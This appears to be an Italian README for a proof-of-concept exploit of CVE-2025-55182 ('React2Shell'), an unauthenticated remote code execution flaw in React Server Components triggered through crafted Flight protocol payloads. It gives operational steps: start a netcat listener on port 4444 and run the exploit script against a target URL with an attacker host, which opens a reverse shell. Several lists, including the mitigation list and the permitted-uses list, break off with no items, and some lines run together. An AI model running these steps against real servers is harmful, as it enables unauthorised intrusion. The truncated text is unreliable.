
Exploit proof-of-concept per CVE-2025-55182 (React2Shell), una vulnerabilità di esecuzione remota di codice non autenticata nei React Server Components tramite payload del protocollo Flight appositamente modificati.
CVE-2025-55182, nota anche come React2Shell, è una critica vulnerabilità di Remote Code Execution (RCE) non autenticata che interessa i pacchetti React Server Components (versioni 19.0, 19.1.0, 19.1.1 e 19.2.0).
Questa vulnerabilità può consentire agli aggressori di ottenere esecuzione arbitraria di codice sui server vulnerabili tramite una singola richiesta HTTP appositamente predisposta, senza richiedere autenticazione.
I React Server Components utilizzano il protocollo Flight per serializzare e deserializzare i dati dei componenti scambiati tra client e server.
Una validazione insufficiente durante questo processo di deserializzazione può consentire a payload appositamente creati di manipolare le strutture interne degli oggetti e raggiungere primitive di esecuzione JavaScript pericolose.
La vulnerabilità deriva da una validazione insufficiente durante la deserializzazione dei payload del protocollo Flight dei React Server Components (RSC).
I payload appositamente predisposti possono:
multipart/form-data appositamente predispostaAvvia un listener sulla tua macchina:
nc -lvnp 4444
Esegui l'exploit:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Per mitigare questa vulnerabilità:
Questo progetto è fornito esclusivamente per:
Gli autori non si assumono alcuna responsabilità per un uso improprio o danni causati da questo materiale. Gli utenti sono gli unici responsabili del rispetto di tutte le leggi e normative applicabili.